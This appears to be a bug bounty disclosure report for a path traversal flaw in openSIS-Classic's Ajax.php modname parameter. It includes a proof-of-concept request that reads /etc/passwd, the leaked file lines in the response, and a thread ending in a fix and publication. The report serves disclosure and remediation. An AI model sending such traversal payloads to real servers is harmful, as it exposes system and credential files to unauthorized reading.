Path Traversal in os4ed/opensis-classic

Valid

Reported on

Aug 27th 2021


✍️ Description

The ajax.php modname parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

🕵️‍♂️ Proof of Concept

// Ajax.php
GET /Ajax.php?modname=../../../../../../../../../../../../../../../../etc/passwd

HTTP/1.1 302 Found
Location: index.php

<script type="text/javascript" src="assets/js/pages/components_popups.js"></script><script type="text/javascript" src="assets/js/pages/picker_date.js"></script><script type="text/javascript" src="assets/js/pages/form_checkboxes_radios.js"></script><script>$(document).ready(function() {
// Animate loader off screen
$("#loading-image").hide();

if($(".clockpicker").length>0){
$(".clockpicker").clockpicker({
twelvehour: true,
donetext: 'Done'
}).find("input").change(function () {
//alert(this.value);
});
}

if($(".switch-fake-title").length > 0){
$(".switch-fake-title").each(function(){
var check = $(this).closest("label").children("input[type=checkbox]");
if(check.is(":checked")){
$(this).text("Yes");
}else{
$(this).text("No");
}
});
}

/*if(hasScrollBar(".table-responsive", "horizontal")){
$(".table-responsive").mousewheel(function (e, delta) {
this.scrollLeft -= (delta * 40);
e.preventDefault();
});
}*/

$(".switch-fake-title").closest("label").children("input[type=checkbox]").change(function(){
if($(this).is(":checked")){
$(this).closest("label").children(".switch-fake-title").text("Yes");
}else{
$(this).closest("label").children(".switch-fake-title").text("No");
}
});

$("body").removeClass("sidebar-mobile-main");

// Scroll page to top after ajax call
//$("html, body").animate({ scrollTop: 0 }, "200");

$('body').on('click', 'div.sidebar-overlay', function () {
$('body').toggleClass('sidebar-mobile-main');
});

$('body').removeClass('sidebar-mobile-main');

// Initializing Tooltips & Popovers after ajax call
$('[data-toggle="tooltip"], [data-popup="tooltip"]').tooltip();
$('[data-popup="popover"]').popover();

});</script><input id="cframe" type="hidden" value="">



<div id="divErr"></div><!DOCTYPE html><html lang="en" dir="ltr><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>openSIS Student Information System</title><link rel="shortcut icon" href="favicon.ico"><script language="JavaScript" type="text/javascript">function newLoad(){ }


var locked;

function putFocus()
{
if(document.forms.length > 0)
{
document.forms[0].elements[0].focus();
}
}

function addHTML(html,id,replace)
{
if(locked!=false)
{
if(replace==true)
document.getElementById(id).innerHTML = html;
else
document.getElementById(id).innerHTML = document.getElementById(id).innerHTML + html;
}
}

function changeHTML(show,hide)
{
for(key in show)
document.getElementById(key).innerHTML = document.getElementById(show[key]).innerHTML;
for(i=0;i<hide.length;i++)
document.getElementById(hide[i]).innerHTML = '';
}

function checkAll(form,value,name_like)
{
if(value==true)
checked = true;
else
checked = false;

for(i=0;i<form.elements.length;i++)
{
if(form.elements[i].type=='checkbox' && form.elements[i].name!='controller' && form.elements[i].name.substr(0,name_like.length)==name_like)
form.elements[i].checked = checked;
}
}
</script></head><BODY marginwidth=0 leftmargin=0 border=0 onload='doOnload();' background=assets/bg.gif><DIV id="Migoicons" style="visibility:hidden;position:absolute;z-index:1000;top:-100"></DIV>root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
<div id='cal' class='divcal'> </div></BODY></HTML>

💥 Impact

Enables an attacker to access sensitive files 📍 Location Ajax.php#L107-L287

N modified the report
a year ago
Z-Old
a year ago

Admin


Hey N, please confirm your production openSIS URL (localhost, IP address or fake URLs are discouraged).

We have contacted a member of the os4ed/opensis-classic team and are waiting to hear back a year ago
We have sent a second follow up to the os4ed/opensis-classic team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the os4ed/opensis-classic team. This report is now considered stale. a year ago
N
2 months ago

Researcher


@admin Good Day - This was fixed under https://github.com/OS4ED/openSIS-Classic/commit/a2d617977fa159185263845ac75b8c83cddd07f0 -- Would you please be able to manually validate? Thank you

Pavlos
2 months ago

Admin


Hey N! I just sent them an email to confirm the above because the severity, vulnerability type and public disclosure still need to be confirmed by the maintainer

Pavlos validated this vulnerability a month ago
N has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Pavlos marked this as fixed in 8.1 with commit a2d617 a month ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Ajax.php#L107-L287 has been validated
Pavlos published this vulnerability a month ago
to join this conversation